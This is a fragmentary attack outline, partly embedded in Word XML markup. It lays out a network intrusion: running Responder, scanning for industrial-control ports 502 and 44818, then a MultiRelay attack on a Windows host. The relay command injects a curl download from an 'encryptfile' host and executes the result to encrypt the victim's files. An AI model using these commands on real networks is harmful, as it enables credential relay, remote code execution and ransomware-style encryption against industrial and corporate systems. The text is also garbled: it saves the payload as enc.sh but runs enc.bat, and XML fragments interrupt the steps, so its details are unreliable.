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python3 start.py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Checking for connection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Responder streaming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Checking for local ip address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IP Scanner for 255.255.X.X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Port Scanner for 502/44818 ports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exist → MultiRelay Attack on machine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Encrypt files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python MultiRelay.py -t IP_ADD_WIN -u ALL -c “curl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https://encryptfile</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -o enc.sh; start enc.bat”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Config Responder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smb - Off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 - Off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python Responder.py -I eth0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Waiting for dc will do \\{error_path}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crypt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